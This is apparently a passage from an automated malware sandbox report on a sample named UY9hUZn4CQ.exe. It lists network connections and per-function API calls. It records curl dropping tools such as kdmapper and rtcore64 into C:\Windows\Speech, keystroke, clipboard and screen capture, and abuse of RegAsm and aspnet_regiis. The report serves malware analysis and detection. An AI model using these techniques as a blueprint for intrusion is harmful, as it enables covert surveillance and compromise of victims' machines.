                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49708 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49711 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49714 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49715 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49719 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49726 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.10:49728 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49732 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49733 version: TLS 1.2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004382A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,47_2_004382A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004382A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,47_2_004382A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,47_2_00438E3C
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C47E550 SetConsoleTitleA,GetConsoleWindow,ShowWindow,system,SetConsoleTitleW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,CreateThread,CreateThread,SleepEx,CreateThread,CreateThread,GetConsoleWindow,ShowWindow,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,Beep,GetConsoleWindow,ShowWindow,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,0_2_00007FF60C47E550
                                Source: taskkill.exeProcess created: 199
                                Source: cmd.exeProcess created: 248

                                System Summary

                                barindex
                                Source: rtcore64.exe.55.drStatic PE information: section name: ZhxHw+
                                Source: rtcore64.exe.55.drStatic PE information: section name:
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess Stats: CPU usage > 49%
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D05A240 GetModuleHandleW,NtQueryInformationProcess,65_2_6D05A240
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,52_2_00EC6FAA
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\imxyvi.exeJump to behavior
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exe
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\rtcore64.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C47C5A70_2_00007FF60C47C5A7
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C47E5500_2_00007FF60C47E550
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C476A300_2_00007FF60C476A30
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4819F00_2_00007FF60C4819F0
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C47B6D00_2_00007FF60C47B6D0
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4781AE0_2_00007FF60C4781AE
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C472C100_2_00007FF60C472C10
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4710000_2_00007FF60C471000
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4751C00_2_00007FF60C4751C0
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4791BE0_2_00007FF60C4791BE
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4736800_2_00007FF60C473680
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4824B00_2_00007FF60C4824B0
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C47783E0_2_00007FF60C47783E
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C47A43E0_2_00007FF60C47A43E
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C47B26E0_2_00007FF60C47B26E
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4828580_2_00007FF60C482858
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C475EE00_2_00007FF60C475EE0
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A952064028_2_00007FF6A9520640
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A95236E028_2_00007FF6A95236E0
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A952458028_2_00007FF6A9524580
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A951915028_2_00007FF6A9519150
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A9539A2028_2_00007FF6A9539A20
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A9535A0028_2_00007FF6A9535A00
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A95259E328_2_00007FF6A95259E3
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A95134B028_2_00007FF6A95134B0
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A953A51828_2_00007FF6A953A518
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A951D3A028_2_00007FF6A951D3A0
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A95143E028_2_00007FF6A95143E0
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A95273E328_2_00007FF6A95273E3
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A951464028_2_00007FF6A9514640
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A9517EC028_2_00007FF6A9517EC0
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A953308028_2_00007FF6A9533080
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0043804047_2_00438040
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042C07047_2_0042C070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0044907047_2_00449070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040100047_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040B0E047_2_0040B0E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040C08047_2_0040C080
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042D15047_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004491F047_2_004491F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0041F19347_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040924047_2_00409240
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042C24347_2_0042C243
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004492F047_2_004492F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0043E2A047_2_0043E2A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004012B347_2_004012B3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040135947_2_00401359
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0041636147_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042D3CC47_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004493D047_2_004493D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004483B047_2_004483B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004113BD47_2_004113BD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040546047_2_00405460
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0044742947_2_00447429
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004094D747_2_004094D7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040A4E047_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042B49047_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004074B047_2_004074B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040B57047_2_0040B570
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004366E047_2_004366E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0041D6A047_2_0041D6A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0044970047_2_00449700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004117C047_2_004117C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042F7DB47_2_0042F7DB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040885047_2_00408850
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040389047_2_00403890
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0044A8B047_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004488B047_2_004488B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0043697047_2_00436970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0045392E47_2_0045392E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0041399C47_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040AA0047_2_0040AA00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00427AFB47_2_00427AFB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042BC5047_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00413CC647_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042CCDD47_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0042CCF547_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00429DF247_2_00429DF2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00437D9047_2_00437D90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_0040CE0047_2_0040CE00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00431E0047_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00415EF647_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00407EB047_2_00407EB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00427F6247_2_00427F62
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00443FA047_2_00443FA0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EC848E52_2_00EC848E
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EC40FE52_2_00EC40FE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED00B752_2_00ED00B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED408852_2_00ED4088
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EE51C952_2_00EE51C9
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED715352_2_00ED7153
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EC32F752_2_00EC32F7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED62CA52_2_00ED62CA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED43BF52_2_00ED43BF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ECF46152_2_00ECF461
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EED44052_2_00EED440
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ECC42652_2_00ECC426
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED77EF52_2_00ED77EF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EED8EE52_2_00EED8EE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EC286B52_2_00EC286B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EF19F452_2_00EF19F4
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ECE9B752_2_00ECE9B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED6CDC52_2_00ED6CDC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ED3E0B52_2_00ED3E0B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ECEFE252_2_00ECEFE2
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EE4F9A52_2_00EE4F9A
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D0580F065_2_6D0580F0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D05AB6065_2_6D05AB60
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D05A24065_2_6D05A240
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D05350065_2_6D053500
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06690065_2_6D066900
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06312065_2_6D063120
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06BD2065_2_6D06BD20
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D05953065_2_6D059530
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06395065_2_6D063950
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06357065_2_6D063570
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06718065_2_6D067180
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06559065_2_6D065590
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D068DA065_2_6D068DA0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D057DC065_2_6D057DC0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D0679C065_2_6D0679C0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D064C2065_2_6D064C20
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D05A85065_2_6D05A850
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D063CC065_2_6D063CC0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D0664D065_2_6D0664D0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06B8F065_2_6D06B8F0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06574065_2_6D065740
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06834065_2_6D068340
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06234065_2_6D062340
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D066BB065_2_6D066BB0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D064FB065_2_6D064FB0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D0697E065_2_6D0697E0
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06423065_2_6D064230
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06264065_2_6D062640
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06964065_2_6D069640
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D078E5565_2_6D078E55
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06166065_2_6D061660
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D053AD065_2_6D053AD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003901A073_2_003901A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038702073_2_00387020
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038100073_2_00381000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003C80A073_2_003C80A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0039508C73_2_0039508C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003A21A073_2_003A21A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038C21073_2_0038C210
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003B821073_2_003B8210
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038B27073_2_0038B270
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003C424073_2_003C4240
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AD29573_2_003AD295
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003812F273_2_003812F2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003C32E073_2_003C32E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038532073_2_00385320
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038937E73_2_0038937E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AA3A873_2_003AA3A8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038139273_2_00381392
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003873D073_2_003873D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003A847273_2_003A8472
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AD4D473_2_003AD4D4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AC51073_2_003AC510
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003B059073_2_003B0590
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038158E73_2_0038158E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003B65E073_2_003B65E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003B167073_2_003B1670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038A68073_2_0038A680
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AC6E173_2_003AC6E1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003C86E073_2_003C86E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038B70073_2_0038B700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038877073_2_00388770
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038378073_2_00383780
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AB83073_2_003AB830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003B682073_2_003B6820
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003BF8E073_2_003BF8E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AE92773_2_003AE927
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003B3A2873_2_003B3A28
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003AB83073_2_003AB830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_00391B5073_2_00391B50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003ADB4B73_2_003ADB4B
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003C8BE073_2_003C8BE0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003C7BE073_2_003C7BE0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038ABD073_2_0038ABD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003BEC6073_2_003BEC60
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0039DDFF73_2_0039DDFF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_00387DD073_2_00387DD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_003C6DCB73_2_003C6DCB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 73_2_0038CF1073_2_0038CF10
                                Source: C:\Windows\Speech\rtcore64.exeCode function: String function: 6D06CCC0 appears 33 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 00EDEB78 appears 39 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 00EDF5F0 appears 31 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 00EDEC50 appears 56 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 0038EBD0 appears 171 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 0038CCF0 appears 51 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CBE0 appears 53 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040EE60 appears 145 times
                                Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084
                                Source: ITDiARjW.log.161.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: QGjYUwSA.log.161.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: oLoCRyrD.log.161.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: XEXXxLMp.log.161.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
